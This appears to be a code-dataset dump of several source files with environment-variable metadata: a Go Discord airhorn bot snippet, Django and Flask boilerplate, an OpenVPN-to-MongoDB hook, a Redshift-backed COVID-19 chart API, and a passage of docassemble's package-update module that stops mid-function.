voice, _ = client.Guild(MyGuildID).VoiceChannel(MyChannelID).Connect(false, true)
})
gateway.MessageCreate(func(_ disgord.Session, m *disgord.MessageCreate) {
// Upon receiving a message with content !airhorn, play a sound to the connection made earlier
if m.Message.Content == "!airhorn" {
f, _ := os.Open("airhorn.dca")
defer f.Close()
_ = voice.StartSpeaking() // Sending a speaking signal is mandatory before sending voice data
_ = voice.SendDCA(f) // Or use voice.SendOpusFrame, this blocks until done sending (realtime audio duration)
_ = voice.StopSpeaking() // Tell Discord we are done sending data.
}
})
}
|
[
"\"DISCORD_TOKEN\""
] |
[] |
[
"DISCORD_TOKEN"
] |
[]
|
["DISCORD_TOKEN"]
|
go
| 1 | 0 | |
yocto/poky/bitbake/lib/toaster/toastermain/wsgi.py
|
"""
# ex:ts=4:sw=4:sts=4:et
# -*- tab-width: 4; c-basic-offset: 4; indent-tabs-mode: nil -*-
#
WSGI config for Toaster project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "Toaster.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "toastermain.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
[] |
[] |
[
"DJANGO_SETTINGS_MODULE"
] |
[]
|
["DJANGO_SETTINGS_MODULE"]
|
python
| 1 | 0 | |
server/manage.py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
print('DJANGO_SETTINGS_MODULE', os.environ.get('DJANGO_SETTINGS_MODULE'))
# use separate settings.py for tests
if 'test' in sys.argv:
print('Using settings/development_test.py')
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'opendp_project.settings.development_test')
elif not 'DJANGO_SETTINGS_MODULE' in os.environ:
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'opendp_project.settings.development')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[] |
[] |
[
"DJANGO_SETTINGS_MODULE"
] |
[]
|
["DJANGO_SETTINGS_MODULE"]
|
python
| 1 | 0 | |
pos_api_project/pos_api_project/asgi.py
|
"""
ASGI config for pos_api_project project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'pos_api_project.settings')
application = get_asgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
conf/connect.py
|
#!/usr/bin/env python3
import os
from pymongo import MongoClient
clients = MongoClient().db.clients
clients.find_one_and_update(
{"cn": os.environ["X509_0_CN"]},
{"$set": {
"ip": os.environ["ifconfig_pool_remote_ip"]
}}
)
|
[] |
[] |
[
"X509_0_CN",
"ifconfig_pool_remote_ip"
] |
[]
|
["X509_0_CN", "ifconfig_pool_remote_ip"]
|
python
| 2 | 0 | |
backend/backend_app.py
|
from datetime import datetime
from dateutil.relativedelta import relativedelta
from collections import defaultdict
import json
import os
import flask
from flask import Flask, jsonify, request
from flask_cors import CORS
from common.mysql_dbms_spark import MysqlDbms
from backend.kafka_utils.producer import produce
application = Flask(__name__)
# CORS
CORS(application)
# run producer
ENDPOINT = 'redshift-cluster-1.c26kfcowhljw.us-west-1.redshift.amazonaws.com'
DATABASE_NAME = 'covid_19'
TABLE_NAME = 'c_19_cases'
IGNORE_VALS = ['Missing', 'NA', None]
USER = os.getenv('RS_USER')
PSWD = os.getenv('RS_PSWD')
# state abv
with open('data/states_abv.json') as states_file:
states_json = json.load(states_file)
@application.route('/getChartInfo', methods=['GET', 'POST'])
def case_endpoint():
"""
post: receive json and add into database
@return:
"""
if request.method == 'POST':
_add_to_db(request.get_json())
res = {"success": True}
else:
res = _get_data_from_query()
# print(res)
return json.dumps(res)
pass
def _add_to_db(cases_data):
"""
@param cases_data: <json>
@return: <boolean> success
"""
print(cases_data)
for case_data in cases_data:
produce(case_data)
pass
def _get_data_from_query():
"""
@return: <boolean> success
<json> data
"""
today = datetime.now()
months_before = today + relativedelta(months=-12) # hard coded to be a year
last_val, first_val = today.strftime('%Y-%m'), months_before.strftime('%Y-%m')
# connect db
dbms = MysqlDbms(ENDPOINT, DATABASE_NAME, TABLE_NAME, USER, PSWD)
pie = _name_value_data(dbms, 'sex', ['Male', 'Female'])
thermodynamic = _name_value_data(dbms, 'res_state')
line = _line_data(dbms, first_val, last_val)
vertical = _xy_data(dbms, 'age_group')
crosswise = _xy_data(dbms, 'process')
# for state names
for state_dict in thermodynamic:
abv = state_dict['name']
state_name = states_json.get(abv)
state_dict['name'] = state_name
return {
"pie": pie,
"line": line,
"thermodynamic": thermodynamic,
"vertical": vertical,
"crosswise": crosswise
}
def _name_value_data(dbms, col_name, cases=None):
"""
@param dbms: <db> dbms object
@param col_name: <str> name of col
@param cases: <list> list of cases eg. ['male', 'female']
@return: <json> data
"""
query_str = """select {}, count(*) as count from {} group by {}""".format(col_name, TABLE_NAME, col_name)
_, query_result = dbms.query(query_str)
# sample query_result: [('NA', 1244276), ('Female', 18846393), ('Male', 17160125), ('Other', 12)]
result_dict = {}
for row in query_result:
result_dict[row[0]] = row[1]
result = []
if not cases:
for key in result_dict.keys():
if key not in IGNORE_VALS:
result.append({"name": key, "value": result_dict[key]})
return result
for case in cases:
if case not in IGNORE_VALS:
result.append({"name": case, "value": result_dict[case]})
return result
pass
def _line_data(dbms, first_val, last_val, col_name='case_month'):
"""
@param dbms: <db> dbms object
@param first_val: <str> like '2021-12'
@param last_val: <str> like '2021-12'
@param col_name: <str> col name, optional
@return: <json> data
"""
query_str = """select {}, count(*) as count from {} group by {}""".format(col_name, TABLE_NAME, col_name)
datetime_first = datetime.strptime(first_val, '%Y-%m')
datetime_last = datetime.strptime(last_val, '%Y-%m')
_, query_result = dbms.query(query_str)
result = []
for row in query_result:
if row[0] not in IGNORE_VALS and (datetime_first <= datetime.strptime(row[0], '%Y-%m') <= datetime_last):
result.append(list(row))
result.sort(key=lambda a: a[0])
return result
pass
def _xy_data(dbms, col_name):
"""
@param dbms: <db> dbms object
@param col_name: <str> col name
@return: <json> data
"""
query_str = """select {}, count(*) as count from {} group by {}""".format(col_name, TABLE_NAME, col_name)
_, query_result = dbms.query(query_str)
result = defaultdict(list)
for row in query_result:
if row[0] not in IGNORE_VALS:
result['yData'].append(row[0])
result['xData'].append(row[1])
return result
pass
if __name__ == '__main__':
application.run(debug=True, host='localhost', port=5001)
|
[] |
[] |
[
"RS_USER",
"RS_PSWD"
] |
[]
|
["RS_USER", "RS_PSWD"]
|
python
| 2 | 0 | |
{{cookiecutter.repo_name}}/python/{{cookiecutter.package_name}}/web/__init__.py
|
# !usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed under a 3-clause BSD license.
#
from __future__ import print_function, division, absolute_import
from flask import Flask, Blueprint
from flask import session, request, render_template, g, jsonify
from inspect import getmembers, isfunction
from {{cookiecutter.package_name}}.web.controllers import index
from {{cookiecutter.package_name}}.web.jinja_filters import jinjablue
from {{cookiecutter.package_name}}.web.error_handlers import errors
from {{cookiecutter.package_name}}.web.extensions import jsglue, flags, sentry, cache, bcrypt, profiler
from {{cookiecutter.package_name}}.web.settings import ProdConfig, DevConfig, CustomConfig
from {{cookiecutter.package_name}}.api.index import MainView
import sys
import os
import logging
# ================================================================================
def create_app(debug=False, local=False, object_config=None):
''' Creates and runs the app '''
# ----------------------------------
# Create App
app_base = os.environ.get('{{cookiecutter.package_name|upper}}_BASE', '{{cookiecutter.package_name}}')
app = Flask(__name__, static_url_path='/{0}/static'.format(app_base))
api = Blueprint("api", __name__, url_prefix='/{0}/api'.format(app_base))
app.debug = debug
# ----------------------------------
# Initialize logging + Sentry + UWSGI config for Production Marvin
# Find which connection to make
# connection = getDbMachine()
# local = (connection == 'local') or local
# ----------------------------------
# Set some environment variables
# os.environ['SAS_REDUX'] = 'sas/mangawork/manga/spectro/redux'
# os.environ['SAS_ANALYSIS'] = 'sas/mangawork/manga/spectro/analysis'
# os.environ['SAS_SANDBOX'] = 'sas/mangawork/manga/sandbox'
# release = os.environ.get('MARVIN_RELEASE', 'mangawork')
# os.environ['SAS_PREFIX'] = 'marvin2' if release == 'mangawork' else 'dr13/marvin'
url_prefix = '/{{cookiecutter.package_name}}' if local else '/{0}'.format(app_base)
# ----------------------------------
# Load the appropriate Flask configuration file for debug or production
if not object_config:
if app.debug or local:
app.logger.info('Loading Development Config!')
object_config = type('Config', (DevConfig, CustomConfig), dict())
else:
app.logger.info('Loading Production Config!')
object_config = type('Config', (ProdConfig, CustomConfig), dict())
app.config.from_object(object_config)
# ------------
# Registration
register_extensions(app, app_base=app_base)
register_api(app, api)
register_blueprints(app, url_prefix=url_prefix)
return app
def register_api(app, api):
''' Register the Flask API routes used '''
MainView.register(api)
app.register_blueprint(api)
def register_extensions(app, app_base=None):
''' Register the Flask extensions used '''
jsglue.JSGLUE_JS_PATH = '/{0}/jsglue.js'.format(app_base)
jsglue.init_app(app)
flags.init_app(app)
bcrypt.init_app(app)
cache.init_app(app)
if app.config['USE_SENTRY']:
sentry.init_app(app)
# Initialize the Flask-Profiler ; see results at localhost:portnumber/app_base/profiler/
if app.config['USE_PROFILER']:
try:
profiler.init_app(app)
except Exception as e:
pass
def register_blueprints(app, url_prefix=None):
''' Register the Flask Blueprints used '''
app.register_blueprint(index.indexblue, url_prefix=url_prefix)
app.register_blueprint(jinjablue)
app.register_blueprint(errors)
|
[] |
[] |
[
"SAS_REDUX",
"SAS_PREFIX",
"SAS_ANALYSIS",
"SAS_SANDBOX",
"{{cookiecutter.package_name|upper}}_BASE",
"MARVIN_RELEASE"
] |
[]
|
["SAS_REDUX", "SAS_PREFIX", "SAS_ANALYSIS", "SAS_SANDBOX", "{{cookiecutter.package_name|upper}}_BASE", "MARVIN_RELEASE"]
|
python
| 6 | 0 | |
docassemble_webapp/docassemble/webapp/update.py
|
import os
import sys
import socket
import tempfile
import subprocess
import xmlrpc.client
import re
#from io import StringIO
import sys
import shutil
import time
import fcntl
from distutils.version import LooseVersion
if __name__ == "__main__":
import docassemble.base.config
docassemble.base.config.load(arguments=sys.argv)
if 'initialize' in sys.argv:
mode = 'initialize'
elif 'check_for_updates' in sys.argv:
mode = 'check_for_updates'
else:
mode = 'initialize'
supervisor_url = os.environ.get('SUPERVISOR_SERVER_URL', None)
if supervisor_url:
USING_SUPERVISOR = True
else:
USING_SUPERVISOR = False
def fix_fnctl():
try:
flags = fcntl.fcntl(sys.stdout, fcntl.F_GETFL);
fcntl.fcntl(sys.stdout, fcntl.F_SETFL, flags&~os.O_NONBLOCK);
sys.stderr.write("fix_fnctl: updated stdout\n")
except:
pass
try:
flags = fcntl.fcntl(sys.stderr, fcntl.F_GETFL);
fcntl.fcntl(sys.stderr, fcntl.F_SETFL, flags&~os.O_NONBLOCK);
sys.stderr.write("fix_fnctl: updated stderr\n")
except:
pass
def remove_inactive_hosts():
start_time = time.time()
sys.stderr.write("remove_inactive_hosts: starting\n")
if USING_SUPERVISOR:
from docassemble.base.config import hostname
from docassemble.webapp.app_object import app
from docassemble.webapp.db_object import db
from docassemble.webapp.core.models import Supervisors
to_delete = set()
for host in Supervisors.query.all():
if host.hostname == hostname:
continue
try:
socket.gethostbyname(host.hostname)
server = xmlrpc.client.Server(host.url + '/RPC2')
result = server.supervisor.getState()
except:
to_delete.add(host.id)
for id_to_delete in to_delete:
Supervisors.query.filter_by(id=id_to_delete).delete()
sys.stderr.write("remove_inactive_hosts: ended after " + str(time.time() - start_time) + " seconds\n")
class DummyPackage(object):
def __init__(self, name):
self.name = name
self.type = 'pip'
self.limitation = None
def check_for_updates(doing_startup=False):
start_time = time.time()
sys.stderr.write("check_for_updates: starting\n")
from docassemble.base.config import hostname
from docassemble.webapp.app_object import app
from docassemble.webapp.db_object import db
from docassemble.webapp.packages.models import Package, Install, PackageAuth
ok = True
here_already = dict()
results = dict()
sys.stderr.write("check_for_updates: 0.5 after " + str(time.time() - start_time) + " seconds\n")
num_deleted = Package.query.filter_by(name='psycopg2').delete()
if num_deleted > 0:
db.session.commit()
num_deleted = Package.query.filter_by(name='pdfminer').delete()
if num_deleted > 0:
db.session.commit()
num_deleted = Package.query.filter_by(name='py-bcrypt').delete()
if num_deleted > 0:
db.session.commit()
num_deleted = Package.query.filter_by(name='pycrypto').delete()
if num_deleted > 0:
db.session.commit()
num_deleted = Package.query.filter_by(name='constraint').delete()
if num_deleted > 0:
db.session.commit()
num_deleted = Package.query.filter_by(name='distutils2').delete()
if num_deleted > 0:
db.session.commit()
sys.stderr.write("check_for_updates: 1 after " + str(time.time() - start_time) + " seconds\n")
installed_packages = get_installed_distributions()
for package in installed_packages:
here_already[package.key] = package.version
changed = False
if 'pdfminer.six' not in here_already:
sys.stderr.write("check_for_updates: installing pdfminer.six\n")
install_package(DummyPackage('pdfminer.six'))
changed = True
if 'psycopg2' in here_already:
sys.stderr.write("check_for_updates: uninstalling psycopg2\n")
uninstall_package(DummyPackage('psycopg2'))
if 'psycopg2-binary' in here_already:
sys.stderr.write("check_for_updates: reinstalling psycopg2-binary\n")
uninstall_package(DummyPackage('psycopg2-binary'))
install_package(DummyPackage('psycopg2-binary'))
changed = True
if 'psycopg2-binary' not in here_already:
sys.stderr.write("check_for_updates: installing psycopg2-binary\n")
install_package(DummyPackage('psycopg2-binary'))
change = True
if 'kombu' not in here_already or LooseVersion(here_already['kombu']) <= LooseVersion('4.1.0'):
sys.stderr.write("check_for_updates: installing new kombu version\n")
install_package(DummyPackage('kombu'))
changed = True
if 'celery' not in here_already or LooseVersion(here_already['celery']) <= LooseVersion('4.1.0'):
sys.stderr.write("check_for_updates: installing new celery version\n")
install_package(DummyPackage('celery'))
changed = True
if 'pycrypto' in here_already:
sys.stderr.write("check_for_updates: uninstalling pycrypto\n")
uninstall_package(DummyPackage('pycrypto'))
if 'pycryptodome' in here_already:
sys.stderr.write("check_for_updates: reinstalling pycryptodome\n")
uninstall_package(DummyPackage('pycryptodome'))
install_package(DummyPackage('pycryptodome'))
changed = True
if 'pycryptodome' not in here_already:
sys.stderr.write("check_for_updates: installing pycryptodome\n")
install_package(DummyPackage('pycryptodome'))
changed = True
if 'pdfminer' in here_already:
sys.stderr.write("check_for_updates: uninstalling pdfminer\n")
uninstall_package(DummyPackage('pdfminer'))
changed = True
if 'pdfminer3k' not in here_already:
sys.stderr.write("check_for_updates: installing pdfminer3k\n")
install_package(DummyPackage('pdfminer3k'))
changed = True
if 'py-bcrypt' in here_already:
sys.stderr.write("check_for_updates: uninstalling py-bcrypt\n")
uninstall_package(DummyPackage('py-bcrypt'))
changed = True
if 'bcrypt' in here_already:
sys.stderr.write("check_for_updates: reinstalling bcrypt\n")
uninstall_package(DummyPackage('bcrypt'))
install_package(DummyPackage('bcrypt'))
changed = True
if 'bcrypt' not in here_already:
sys.stderr.write("check_for_updates: installing bcrypt\n")
install_package(DummyPackage('bcrypt'))
changed = True
if changed:
installed_packages = get_installed_distributions()
here_already = dict()
for package in installed_packages:
here_already[package.key] = package.version
packages = dict()
installs = dict()
to_install = list()
to_uninstall = list()
uninstall_done = dict()
uninstalled_packages = dict()
logmessages = ''
package_by_name = dict()
sys.stderr.write("check_for_updates: 2 after " + str(time.time() - start_time) + " seconds\n")
for package in Package.query.filter_by(active=True).all():
package_by_name[package.name] = package
#sys.stderr.write("check_for_updates: database includes a package called " + package.name + " after " + str(time.time() - start_time) + " seconds\n")
# packages is what is supposed to be installed
sys.stderr.write("check_for_updates: 3 after " + str(time.time() - start_time) + " seconds\n")
for package in Package.query.filter_by(active=True).all():
if package.type is not None:
packages[package.id] = package
#sys.stderr.write("check_for_updates: database includes a package called " + package.name + " that has a type after " + str(time.time() - start_time) + " seconds\n")
#print("Found a package " + package.name)
sys.stderr.write("check_for_updates: 4 after " + str(time.time() - start_time) + " seconds\n")
for package in Package.query.filter_by(active=False).all():
if package.name not in package_by_name:
#sys.stderr.write("check_for_updates: database says " + package.name + " should be uninstalled after " + str(time.time() - start_time) + " seconds\n")
uninstalled_packages[package.id] = package # this is what the database says should be uninstalled
sys.stderr.write("check_for_updates: 5 after " + str(time.time() - start_time) + " seconds\n")
for install in Install.query.filter_by(hostname=hostname).all():
installs[install.package_id] = install # this is what the database says in installed on this server
if install.package_id in uninstalled_packages and uninstalled_packages[install.package_id].name not in package_by_name:
sys.stderr.write("check_for_updates: " + uninstalled_packages[install.package_id].name + " will be uninstalled after " + str(time.time() - start_time) + " seconds\n")
to_uninstall.append(uninstalled_packages[install.package_id]) # uninstall if it is installed
changed = False
package_owner = dict()
sys.stderr.write("check_for_updates: 6 after " + str(time.time() - start_time) + " seconds\n")
for auth in PackageAuth.query.filter_by(authtype='owner').all():
package_owner[auth.package_id] = auth.user_id
sys.stderr.write("check_for_updates: 7 after " + str(time.time() - start_time) + " seconds\n")
for package in packages.values():
if package.id not in installs and package.name in here_already:
sys.stderr.write("check_for_updates: package " + package.name + " here already. Writing an Install record for it.\n")
install = Install(hostname=hostname, packageversion=here_already[package.name], version=package.version, package_id=package.id)
db.session.add(install)
installs[package.id] = install
changed = True
if changed:
db.session.commit()
sys.stderr.write("check_for_updates: 8 after " + str(time.time() - start_time) + " seconds\n")
for package in packages.values():
#sys.stderr.write("check_for_updates: processing package id " + str(package.id) + "\n")
#sys.stderr.write("1: " + str(installs[package.id].packageversion) + " 2: " + str(package.packageversion) + "\n")
if (package.packageversion is not None and package.id in installs and installs[package.id].packageversion is None) or (package.packageversion is not None and package.id in installs and installs[package.id].packageversion is not None and LooseVersion(package.packageversion) > LooseVersion(installs[package.id].packageversion)):
sys.stderr.write("check_for_updates: a new version of " + package.name + " is needed because the necessary package version, " + str(package.packageversion) + ", is ahead of the installed version, " + str(installs[package.id].packageversion) + " after " + str(time.time() - start_time) + " seconds\n")
new_version_needed = True
else:
new_version_needed = False
#sys.stderr.write("got here and new version is " + str(new_version_needed) + "\n")
# Check for missing local packages
if (package.name not in here_already) and (package.id in installs):
sys.stderr.write("check_for_updates: the package " + package.name + " is supposed to be installed on this server, but was not detected after " + str(time.time() - start_time) + " seconds\n")
package_missing = True
else:
package_missing = False
if package.id in installs and package.version > installs[package.id].version:
sys.stderr.write("check_for_updates: the package " + package.name + " has internal version " + str(package.version) + " but the installed version has version " + str(installs[package.id].version) + " after " + str(time.time() - start_time) + " seconds\n")
package_version_greater = True
else:
package_version_greater = False
if package.id not in installs:
sys.stderr.write("check_for_updates: the package " + package.name + " is not in the table of installed packages for this server after " + str(time.time() - start_time) + " seconds\n")
if package.id not in installs or package_version_greater or new_version_needed or package_missing:
to_install.append(package)
#sys.stderr.write("done with that" + "\n")
sys.stderr.write("check_for_updates: 9 after " + str(time.time() - start_time) + " seconds\n")
for package in to_uninstall:
#sys.stderr.write("Going to uninstall a package: " + package.name + "\n")
if package.name in uninstall_done:
sys.stderr.write("check_for_updates: skipping uninstallation of " + str(package.name) + " because already uninstalled after " + str(time.time() - start_time) + " seconds" + "\n")
continue
if package.name not in here_already:
sys.stderr.write("check_for_updates: skipping uninstallation of " + str(package.name) + " because not installed" + " after " + str(time.time() - start_time) + " seconds\n")
returnval = 1
newlog = ''
else:
returnval, newlog = uninstall_package(package)
uninstall_done[package.name] = 1
logmessages += newlog
if returnval == 0:
Install.query.filter_by(hostname=hostname, package_id=package.id).delete()
results[package.name] = 'pip uninstall command returned success code. See log for details.'
elif returnval == 1:
Install.query.filter_by(hostname=hostname, package_id=package.id).delete()
results[package.name] = 'pip uninstall was not run because the package was not installed.'
else:
results[package.name] = 'pip uninstall command returned failure code'
ok = False
packages_to_delete = list()
sys.stderr.write("check_for_updates: 10 after " + str(time.time() - start_time) + " seconds\n")
for package in to_install:
sys.stderr.write("check_for_updates: going to install a package: " + package.name + "after " + str(time.time() - start_time) + " seconds\n")
# if doing_startup and package.name.startswith('docassemble') and package.name in here_already:
# #adding this because of unpredictability of installing new versions of docassemble
# #just because of a system restart.
# sys.stderr.write("check_for_updates: skipping update on " + str(package.name) + "\n")
# continue
returnval, newlog = install_package(package)
logmessages += newlog
sys.stderr.write("check_for_updates: return value was " + str(returnval) + " after " + str(time.time() - start_time) + " seconds\n")
if returnval != 0:
sys.stderr.write("Return value was not good" + " after " + str(time.time() - start_time) + " seconds\n")
ok = False
#pip._vendor.pkg_resources._initialize_master_working_set()
pip_info = get_pip_info(package.name)
real_name = pip_info['Name']
sys.stderr.write("check_for_updates: real name of package " + str(package.name) + " is " + str(real_name) + "\n after " + str(time.time() - start_time) + " seconds")
if real_name is None:
results[package.name] = 'install failed'
ok = False
if package.name not in here_already:
sys.stderr.write("check_for_updates: removing package entry for " + package.name + " after " + str(time.time() - start_time) + " seconds\n")
packages_to_delete.append(package)
elif returnval != 0:
results[package.name] = 'pip install command returned failure code'
else:
results[package.name] = 'pip install command returned success code. See log for details.'
if real_name != package.name:
sys.stderr.write("check_for_updates: changing name" + " after " + str(time.time() - start_time) + " seconds\n")
package.name = real_name
if package.id in installs:
install = installs[package.id]
install.version = package.version
else:
install = Install(hostname=hostname, packageversion=package.packageversion, version=package.version, package_id=package.id)
db.session.add(install)
db.session.commit()
update_versions()
add_dependencies(package_owner.get(package.id, 1))
update_versions()
sys.stderr.write("check_for_updates: 11 after " + str(time.time() - start_time) + " seconds\n")
for package in packages_to_delete:
db.session.delete(package)
sys.stderr.write("check_for_updates: 12 after " + str(time.time() - start_time) + " seconds\n")
db.session.commit()
sys.stderr.write("check_for_updates: finished uninstalling and installing after " + str(time.time() - start_time) + " seconds\n")
return ok, logmessages, results
def update_versions():
start_time = time.time()
sys.stderr.write("update_versions: starting" + "\n")
from docassemble.base.config import hostname
from docassemble.webapp.app_object import app
from docassemble.webapp.db_object import db
from docassemble.webapp.packages.models import Package, Install, PackageAuth
from docassemble.webapp.daredis import r
install_by_id = dict()
for install in Install.query.filter_by(hostname=hostname).all():
install_by_id[install.package_id] = install
package_by_name = dict()
for package in Package.query.filter_by(active=True).order_by(Package.name, Package.id.desc()).all():
if package.name in package_by_name:
continue
package_by_name[package.name] = Object(id=package.id, packageversion=package.packageversion, name=package.name)
installed_packages = get_installed_distributions()
for package in installed_packages:
if package.key in package_by_name:
if package_by_name[package.key].id in install_by_id and package.version != install_by_id[package_by_name[package.key].id].packageversion:
install_row = Install.query.filter_by(hostname=hostname, package_id=package_by_name[package.key].id).first()
install_row.packageversion = package.version
if package.version != package_by_name[package.key].packageversion:
package_row = Package.query.filter_by(active=True, name=package_by_name[package.key].name).with_for_update().first()
package_row.packageversion = package.version
db.session.commit()
sys.stderr.write("update_versions: ended after " + str(time.time() - start_time) + "\n")
return
def get_home_page_dict():
from docassemble.base.config import daconfig
PACKAGE_DIRECTORY = daconfig.get('packages', '/usr/share/docassemble/local' + str(sys.version_info.major) + '.' + str(sys.version_info.minor))
FULL_PACKAGE_DIRECTORY = os.path.join(PACKAGE_DIRECTORY, 'lib', 'python' + str(sys.version_info.major) + '.' + str(sys.version_info.minor), 'site-packages')
home_page = dict()
for d in os.listdir(FULL_PACKAGE_DIRECTORY):
if not d.startswith('docassemble.'):
continue
metadata_path = os.path.join(d, 'METADATA')
if os.path.isfile(metadata_path):
name = None
url = None
with open(metadata_path, 'rU', encoding='utf-8') as fp:
for line in fp:
if line.startswith('Name: '):
name = line[6:]
elif line.startswith('Home-page: '):
url = line[11:]
break
if name:
home_page[name.lower()] = url
return home_page
def add_dependencies(user_id):
start_time = time.time()
#sys.stderr.write('add_dependencies: user_id is ' + str(user_id) + "\n")
sys.stderr.write("add_dependencies: starting\n")
from docassemble.base.config import hostname
from docassemble.webapp.app_object import app
from docassemble.webapp.db_object import db
from docassemble.webapp.packages.models import Package, Install, PackageAuth
packages_known = set()
for package in Package.query.filter_by(active=True).all():
packages_known.add(package.name)
installed_packages = get_installed_distributions()
home_pages = None
packages_to_add = list()
for package in installed_packages:
if package.key in packages_known:
continue
if package.key.startswith('mysqlclient') or package.key.startswith('mysql-connector') or package.key.startswith('MySQL-python'):
continue
Package.query.filter_by(name=package.key).delete()
packages_to_add.append(package)
if len(packages_to_add):
db.session.commit()
for package in packages_to_add:
package_auth = PackageAuth(user_id=user_id)
if package.key.startswith('docassemble.'):
if home_pages is None:
home_pages = get_home_page_dict()
home_page = home_pages.get(package.key.lower(), None)
if home_page is not None and re.search(r'/github.com/', home_page):
package_entry = Package(name=package.key, package_auth=package_auth, type='git', giturl=home_page, packageversion=package.version, dependency=True)
else:
package_entry = Package(name=package.key, package_auth=package_auth, type='pip', packageversion=package.version, dependency=True)
else:
package_entry = Package(name=package.key, package_auth=package_auth, type='pip', packageversion=package.version, dependency=True)
db.session.add(package_entry)
db.session.commit()
install = Install(hostname=hostname, packageversion=package_entry.packageversion, version=package_entry.version, package_id=package_entry.id)
db.session.add(install)
db.session.commit()
sys.stderr.write("add_dependencies: ending after " + str(time.time() - start_time) + " seconds\n")
return
def fix_names():
from docassemble.webapp.app_object import app
from docassemble.webapp.db_object import db
from docassemble.webapp.packages.models import Package, Install, PackageAuth
installed_packages = [package.key for package in get_installed_distributions()]
for package in Package.query.filter_by(active=True).with_for_update().all():
if package.name not in installed_packages:
pip_info = get_pip_info(package.name)
actual_name = pip_info['Name']
if actual_name is not None:
package.name = actual_name
else:
sys.stderr.write("fix_names: package " + package.name + " does not appear to be installed" + "\n")
db.session.commit()
def splitall(path):
allparts = []
while 1:
parts = os.path.split(path)
if parts[0] == path:
allparts.insert(0, parts[0])
break
elif parts[1] == path:
allparts.insert(0, parts[1])
break
else:
path = parts[0]
allparts.insert(0, parts[1])
return allparts
def install_package(package):
sys.stderr.write("install_package: " + package.name + "\n")
if package.type == 'zip' and package.upload is None:
return 0, ''
sys.stderr.write('install_package: ' + package.name + "\n")
from docassemble.base.config import daconfig
from docassemble.webapp.daredis import r
from docassemble.webapp.files import SavedFile
PACKAGE_DIRECTORY = daconfig.get('packages', '/usr/share/docassemble/local' + str(sys.version_info.major) + '.' + str(sys.version_info.minor))
logfilecontents = ''
pip_log = tempfile.NamedTemporaryFile()
temp_dir = tempfile.mkdtemp()
#use_pip_cache = r.get('da:updatepackage:use_pip_cache')
#if use_pip_cache is None:
# disable_pip_cache = False
#elif int(use_pip_cache):
# disable_pip_cache = False
#else:
# disable_pip_cache = True
disable_pip_cache = True
if package.type == 'zip' and package.upload is not None:
saved_file = SavedFile(package.upload, extension='zip', fix=True)
commands = ['pip', 'install']
if disable_pip_cache:
commands.append('--no-cache-dir')
commands.extend(['--quiet', '--prefix=' + PACKAGE_DIRECTORY, '--src=' + temp_dir, '--log-file=' + pip_log.name, '--upgrade', saved_file.path + '.zip'])
elif package.type == 'git' and package.giturl is not None:
if package.gitbranch is not None:
branchpart = '@' + str(package.gitbranch)
else:
branchpart = ''
if package.gitsubdir is not None:
commands = ['pip', 'install']
if disable_pip_cache:
commands.append('--no-cache-dir')
commands.extend(['--quiet', '--prefix=' + PACKAGE_DIRECTORY, '--src=' + temp_dir, '--upgrade', '--log-file=' + pip_log.name, 'git+' + str(package.giturl) + '.git' + branchpart + '#egg=' + package.name + '&subdirectory=' + str(package.gitsubdir)])
else:
commands = ['pip', 'install']
if disable_pip_cache:
commands.append('--no-cache-dir')
commands.extend(['--quiet', '--prefix=' + PACKAGE_DIRECTORY, '--src=' + temp_dir, '--upgrade', '--log-file=' + pip_log.name, 'git+' + str(package.giturl) + '.git' + branchpart + '#egg=' + package.name])
elif package.type == 'pip':
if package.limitation is None:
limit = ""
else:
limit = str(package.limitation)
commands = ['pip', 'install']
if disable_pip_cache:
commands.append('--no-cache-dir')
commands.extend(['--quiet', '--prefix=' + PACKAGE_DIRECTORY, '--src=' + temp_dir, '--upgrade', '--log-file=' + pip_log.name, package.name + limit])
else:
sys.stderr.write("Wrong package type\n")
return 1, 'Unable to recognize package type: ' + package.name
sys.stderr.write("install_package: running " + " ".join(commands) + "\n")
logfilecontents += " ".join(commands) + "\n"
returnval = 1
try:
subprocess.run(commands)
returnval = 0
except subprocess.CalledProcessError as err:
returnval = err.returncode
fix_fnctl()
sys.stderr.flush()
sys.stdout.flush()
time.sleep(4)
with open(pip_log.name, 'rU', encoding='utf-8') as x:
logfilecontents += x.read()
pip_log.close()
try:
sys.stderr.write(logfilecontents + "\n")
except:
pass
sys.stderr.flush()
sys.stdout.flush()
time.sleep(4)
sys.stderr.write('returnval is: ' + str(returnval) + "\n")
sys.stderr.write('install_package: done' + "\n")
shutil.rmtree(temp_dir)
return returnval, logfilecontents
def uninstall_package(package):
sys.stderr.write('uninstall_package: ' + package.name + "\n")
logfilecontents = ''
#sys.stderr.write("uninstall_package: uninstalling " + package.name + "\n")
pip_log = tempfile.NamedTemporaryFile()
commands = ['pip', 'uninstall', '--yes', '--log-file=' + pip_log.name, package.name]
sys.stderr.write("Running " + " ".join(commands) + "\n")
